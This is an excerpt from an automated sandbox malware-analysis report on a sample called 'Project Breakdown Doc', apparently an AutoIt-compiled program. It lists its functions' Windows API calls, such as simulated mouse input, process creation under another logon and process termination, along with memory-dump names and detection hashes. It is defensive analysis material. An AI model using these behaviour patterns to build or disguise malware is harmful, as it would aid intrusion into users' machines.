                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: 7603fcca429ca8a551c6e1f09ab75bfbc8b6dc506624b76d2bcf7dfba546bd8c
                                                  • Instruction ID: a68cec5b23193dfc72ce286d40c1ef3e2fdca58273eb1f271405fc203f5df2b1
                                                  • Opcode Fuzzy Hash: 7603fcca429ca8a551c6e1f09ab75bfbc8b6dc506624b76d2bcf7dfba546bd8c
                                                  • Instruction Fuzzy Hash: AD519E71A00226DBDF24CF6CD988BAEBBF5AF46318F104169F8219B2D1D7748A04CB51
                                                  Function 00C41765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C4179A
                                                  • GetWindowRect.USER32(?,?), ref: 00C417FE
                                                  • ScreenToClient.USER32(?,?), ref: 00C4181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C4182C
                                                  • EndPaint.USER32(?,?), ref: 00C41876
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: d2aae76f4d6c090e2679cee5993bbd9f1dc304fe0cb70b071a5cc9c75a57b5cc
                                                  • Instruction ID: 15c70be12e92086d4cda818b11e836cfc5e6fef25312d035fa3ed0483fc85a52
                                                  • Opcode Fuzzy Hash: d2aae76f4d6c090e2679cee5993bbd9f1dc304fe0cb70b071a5cc9c75a57b5cc
                                                  • Instruction Fuzzy Hash: D6417B70104301AFD711DF25C884FBA7BE9FB49724F184629FAA8C62E1C731D985EB61
                                                  Function 00CCB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(00D067B0,00000000,017A55B0,?,?,00D067B0,?,00CCB862,?,?), ref: 00CCB9CC
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00CCB9F0
                                                  • ShowWindow.USER32(00D067B0,00000000,017A55B0,?,?,00D067B0,?,00CCB862,?,?), ref: 00CCBA50
                                                  • ShowWindow.USER32(00000000,00000004,?,00CCB862,?,?), ref: 00CCBA62
                                                  • EnableWindow.USER32(00000000,00000001), ref: 00CCBA86
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CCBAA9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 38526cea1d8a0c1d19e3ef786ab1a995bd0ea56ea8a69af38c55cb0b63ab8d4b
                                                  • Instruction ID: 28f218f2fffdfe133d34d30bf2845edbd08b19688e0f988ec43264fe08855f80
                                                  • Opcode Fuzzy Hash: 38526cea1d8a0c1d19e3ef786ab1a995bd0ea56ea8a69af38c55cb0b63ab8d4b
                                                  • Instruction Fuzzy Hash: 52415130600241AFDB26CF94C48AF997BF1BB05310F1841BDFA589F2A2C732AD46DB51
                                                  Function 00CB73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00CB5134,?,?,00000000,00000001), ref: 00CB73BF
                                                    • Part of subcall function 00CB3C94: GetWindowRect.USER32(?,?), ref: 00CB3CA7
                                                  • GetDesktopWindow.USER32 ref: 00CB73E9
                                                  • GetWindowRect.USER32(00000000), ref: 00CB73F0
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CB7422
                                                    • Part of subcall function 00CA54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA555E
                                                  • GetCursorPos.USER32(?), ref: 00CB744E
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CB74AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 633a5954d8a905a69c4f4e8721d9ffa5973eb572d8c19f87ca50040a14b99211
                                                  • Instruction ID: 74df4b7446459ee3aa9557aa59306d59b64bb55ee33cacd7ec997eaf7f91bae8
                                                  • Opcode Fuzzy Hash: 633a5954d8a905a69c4f4e8721d9ffa5973eb572d8c19f87ca50040a14b99211
                                                  • Instruction Fuzzy Hash: B331B672509306ABD720DF54D849F9FBBAAFF88314F004A29F99597191C670EA09CF92
                                                  Function 00C98D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C985F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C98608
                                                    • Part of subcall function 00C985F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C98612
                                                    • Part of subcall function 00C985F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C98621
                                                    • Part of subcall function 00C985F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C98628
                                                    • Part of subcall function 00C985F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9863E
                                                  • GetLengthSid.ADVAPI32(?,00000000,00C98977), ref: 00C98DAC
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C98DB8
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C98DBF
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C98DD8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00C98977), ref: 00C98DEC
                                                  • HeapFree.KERNEL32(00000000), ref: 00C98DF3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: ca812f1878f6a216c0bbb4644e87c0aa4ea805b7783e5aeccf98c7843d7c4489
                                                  • Instruction ID: 3bbce7418fc8ce04ab5db8324bb34a86f0466ab64e5c31aa36ddb24ad3c0a52b
                                                  • Opcode Fuzzy Hash: ca812f1878f6a216c0bbb4644e87c0aa4ea805b7783e5aeccf98c7843d7c4489
                                                  • Instruction Fuzzy Hash: DB11BE32501606FFDF109FA4CC0DFAE7BAAEF56315F14402EE85997251CB329A09DB60
                                                  Function 00C98AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C98B2A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C98B31
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C98B40
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C98B4B
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C98B7A
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C98B8E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 30876dbff149a96e3f2b2b9fe0b3465e4d9cfa07696870b1060cdc1a7ce38224
                                                  • Instruction ID: 2e9080a58818091b4c26c83afe53c2772527e6db9581c4be132392db0d4393cf
                                                  • Opcode Fuzzy Hash: 30876dbff149a96e3f2b2b9fe0b3465e4d9cfa07696870b1060cdc1a7ce38224
                                                  • Instruction Fuzzy Hash: 52112CB2501249ABDF018FA4DD49FDE7BA9FF49704F084069FE04A2160C7769E659B60
                                                  Function 00CCC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C4134D
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4135C
                                                    • Part of subcall function 00C412F3: BeginPath.GDI32(?), ref: 00C41373
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4139C
                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CCC1C4
                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00CCC1D8
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCC1E6
                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00CCC1F6
                                                  • EndPath.GDI32(00000000), ref: 00CCC206
                                                  • StrokePath.GDI32(00000000), ref: 00CCC216
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: c3b876486d19ac62571c17346d57c70a85db26f826b3ea804d19b542ae837cfa
                                                  • Instruction ID: 7f6f698aa8ef886faff82afb084e5169b3df850b65b576b0db72b2f918971215
                                                  • Opcode Fuzzy Hash: c3b876486d19ac62571c17346d57c70a85db26f826b3ea804d19b542ae837cfa
                                                  • Instruction Fuzzy Hash: CD11097640010CBFEB119F90DC88FAA7FADFB08354F048029FA189A1A1C7719E56DBA0
                                                  Function 00C603A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C603D3
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C603DB
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C603E6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C603F1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C603F9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C60401
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: 59caf0366977b14bbffd4198f021afb7f106f803d626bf4f5486581058d69568
                                                  • Instruction ID: 4542cd8a1659b1e9c07da7bcb510ebeb1ea4a45f9a32dedef1006a21bb3a601c
                                                  • Opcode Fuzzy Hash: 59caf0366977b14bbffd4198f021afb7f106f803d626bf4f5486581058d69568
                                                  • Instruction Fuzzy Hash: BE0148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA15847941C7B5A864CBE5
                                                  Function 00CA568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CA569B
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CA56B1
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00CA56C0
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA56CF
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA56D9
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA56E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: dee63f4b8eae6e447cac43d6d8274542e375095892de3cd1b1286dff5f07a974
                                                  • Instruction ID: 57693c993cc9812f76675fc847c20d8d03735156acc0d9d6b229a8ecff7ca5f1
                                                  • Opcode Fuzzy Hash: dee63f4b8eae6e447cac43d6d8274542e375095892de3cd1b1286dff5f07a974
                                                  • Instruction Fuzzy Hash: C4F03032641559BBE7215BA2DC0DFEF7B7DEFC6B11F04016DFA04D1060D7A15A0286B5
                                                  Function 00CA74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00CA74E5
                                                  • EnterCriticalSection.KERNEL32(?,?,00C51044,?,?), ref: 00CA74F6
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00C51044,?,?), ref: 00CA7503
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C51044,?,?), ref: 00CA7510
                                                    • Part of subcall function 00CA6ED7: CloseHandle.KERNEL32(00000000,?,00CA751D,?,00C51044,?,?), ref: 00CA6EE1
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA7523
                                                  • LeaveCriticalSection.KERNEL32(?,?,00C51044,?,?), ref: 00CA752A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 4bd685cb1dfab8d38d0bd34f74ffe7b660515e0d4e28ca6b05b427b3c5001e83
                                                  • Instruction ID: 9bdedc970e74f05bf218815659c8c14189108facb139e9b11cd99df7a1035ada
                                                  • Opcode Fuzzy Hash: 4bd685cb1dfab8d38d0bd34f74ffe7b660515e0d4e28ca6b05b427b3c5001e83
                                                  • Instruction Fuzzy Hash: 41F03A3A540612EBDB121B64EC88FEE772AFF45302B04063AF202914A1CB755902CA50
                                                  Function 00C98E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C98E7F
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00C98E8B
                                                  • CloseHandle.KERNEL32(?), ref: 00C98E94
                                                  • CloseHandle.KERNEL32(?), ref: 00C98E9C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C98EA5
                                                  • HeapFree.KERNEL32(00000000), ref: 00C98EAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: 1f40b04056b1e9315e558e2d3509d71a7e656aacb68156298d9e4b1f381c4723
                                                  • Instruction ID: 24df45cc620abce825933240eef7a5f0a739e8df64e441590168f1919b3f9719
                                                  • Opcode Fuzzy Hash: 1f40b04056b1e9315e558e2d3509d71a7e656aacb68156298d9e4b1f381c4723
                                                  • Instruction Fuzzy Hash: D3E05276104505FBDA021FE6EC0CF5EBB6AFB89762B58863AF21981470CB329462DB50
                                                  Function 00CB8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00CB8928
                                                  • CharUpperBuffW.USER32(?,?), ref: 00CB8A37
                                                  • VariantClear.OLEAUT32(?), ref: 00CB8BAF
                                                    • Part of subcall function 00CA7804: VariantInit.OLEAUT32(00000000), ref: 00CA7844
                                                    • Part of subcall function 00CA7804: VariantCopy.OLEAUT32(00000000,?), ref: 00CA784D
                                                    • Part of subcall function 00CA7804: VariantClear.OLEAUT32(00000000), ref: 00CA7859
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: c5bbdf9231589853a0b870ddf8c1808da531a5a0ef5d94e98fd64972f15ce0bf
                                                  • Instruction ID: 59530752426720722cbef378d42b10b84de40d403a09ecb48b7717abe8eff7b8
                                                  • Opcode Fuzzy Hash: c5bbdf9231589853a0b870ddf8c1808da531a5a0ef5d94e98fd64972f15ce0bf
                                                  • Instruction Fuzzy Hash: C5918F756083019FCB10DF24C4859ABBBE8FF89354F14496EF89A8B361DB31E909DB52
                                                  Function 00CA2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                  • _memset.LIBCMT ref: 00CA3077
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA30A6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA3159
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CA3187
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: bae1f64d63533b51647658db3c9c389e71eaea7ba5e49158effa06dda3fced8a
                                                  • Instruction ID: 3635a602d868d2b0dbdf00ad8b05e244c7bf670656b1c83047b6d2b42f1fd8f0
                                                  • Opcode Fuzzy Hash: bae1f64d63533b51647658db3c9c389e71eaea7ba5e49158effa06dda3fced8a
                                                  • Instruction Fuzzy Hash: 6451DF316083829FD7259F68C855A6FB7E4EF46318F040A2DFAA5D21E1DB70CF449792
                                                  Function 00C9DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9DAC5
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C9DAFB
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C9DB0C
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C9DB8E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
